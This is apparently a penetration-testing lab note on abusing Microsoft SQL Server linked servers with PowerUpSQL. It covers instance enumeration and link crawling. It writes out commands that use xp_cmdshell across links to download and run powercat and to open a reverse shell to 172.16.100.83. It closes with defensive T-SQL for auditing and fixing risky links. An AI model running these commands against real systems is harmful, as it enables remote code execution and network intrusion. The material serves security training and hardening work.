# MSSQL Servers

## Tools

[PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) includes functions that support SQL Server discovery, weak configuration auditing, privilege escalation at scale, and post-exploitation actions such as OS command execution.

{% embed url="https://github.com/NetSPI/PowerUpSQL" %}

## Enumeration

```powershell
# Discover SQL Server instances in the domain via their SPNs
Get-SQLInstanceDomain

# Check which discovered instances the current user can log in to
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded

# Version, service account and other instance information
Get-SQLInstanceDomain | Get-SQLServerInfo
```

### Database Links

A database link allows a SQL Server to access external data sources like other SQL Servers and Data Source Objects (OLE DB).

In the case of database links between SQL servers (linked servers), it is possible to execute stored procedures on the linked server, even across forest trusts.

```powershell
# List the links configured on the remote instance (one hop)
Get-SQLServerLink -Instance dcorp-mssql
# Using HeidiSQL
select * from master..sysservers

# Crawl database links recursively (follows links of links)
Get-SQLServerLinkCrawl -Instance dcorp-mssql
# Using HeidiSQL
select * from openquery("DCORP-SQL1", 'select * from openquery("DCORP-MGMT",''select * from master..sysservers'')')
```

## Abuse

We can use links to execute commands across database links where the link's mapped login is a sysadmin on the remote side (Sysadmin set to 1 in the crawl output).

```powershell
# Run a command on the eu-sql link; the crawl returns the output per link
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" -QueryTarget eu-sql
# Using HeidiSQL (each nesting level doubles the single quotes)
SELECT *
FROM OPENQUERY("dcorp-sql1", '
    SELECT *
    FROM OPENQUERY("dcorp-mgmt", ''
       SELECT *
       FROM OPENQUERY("EU-SQL32.EU.EUROCORP.LOCAL",''''
           SELECT @@version AS version;
           EXEC master..xp_cmdshell "powershell iex (iwr http://172.16.100.83/powercat.ps1 -UseBasicParsing)";
       '''')
    '')
')

# revshell example (the DownloadString call and the powercat call are separate statements)
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell "powershell iex ((New-Object Net.WebClient).DownloadString(''http://172.16.100.83/powercat.ps1''));powercat -c 172.16.100.83 -p 443 -e powershell"' -QueryTarget eu-sql32
```

If `rpcout` is enabled on the link (it is disabled by default), `xp_cmdshell` can be enabled on the linked server using:

```sql
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "eu-sql"
```
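To audit the same exposure from the defender's side, the following T-SQL (an added example, not from these notes or from PowerUpSQL) lists every link with its `rpc out` setting and login mapping, checks whether the identity a link uses on the remote server is sysadmin, and shows the option changes that remove the weak configuration. The link name `eu-sql`, the login `link_reader` and the password are assumed placeholders.

```sql
-- Inventory of linked servers and the login mapping each link uses.
-- A link with rpc_out = 1 accepts EXECUTE ... AT (e.g. sp_configure);
-- a link with data_access = 1 accepts OPENQUERY.
-- impersonate = 0 with a mapped_remote_login means a stored credential is
-- used for every caller, which is what makes link crawling privilege-agnostic.
SELECT
    s.name                   AS link_name,
    s.data_source            AS remote_server,
    s.is_rpc_out_enabled     AS rpc_out,
    s.is_data_access_enabled AS data_access,
    CASE WHEN ll.local_principal_id = 0 THEN '<all logins>' ELSE p.name END
                             AS local_login,
    ll.uses_self_credential  AS impersonate,
    ll.remote_name           AS mapped_remote_login
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll
       ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS p
       ON p.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name;

-- Check what the link's identity can do on the remote side (1 = sysadmin).
-- This is the property the crawl output reports as Sysadmin.
SELECT * FROM OPENQUERY([eu-sql],
    'SELECT SUSER_SNAME() AS remote_login,
            IS_SRVROLEMEMBER(''sysadmin'') AS link_is_sysadmin');

-- Remediation 1: a link that only needs to read data does not need
-- remote procedure calls; disabling rpc out blocks EXECUTE ... AT.
EXEC sp_serveroption @server = N'eu-sql', @optname = N'rpc out', @optvalue = N'false';

-- Remediation 2: replace a catch-all mapping to a privileged remote account
-- with a dedicated low-privilege remote login (placeholder credentials).
EXEC sp_droplinkedsrvlogin @rmtsrvname = N'eu-sql', @locallogin = NULL;
EXEC sp_addlinkedsrvlogin  @rmtsrvname = N'eu-sql', @useself = N'false',
                           @locallogin = NULL,
                           @rmtuser = N'link_reader',
                           @rmtpassword = N'<placeholder-password>';
```

Run the inventory query on each instance that appears in a crawl; a link whose remote identity is sysadmin on an instance that itself has onward links is the hop worth fixing first.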
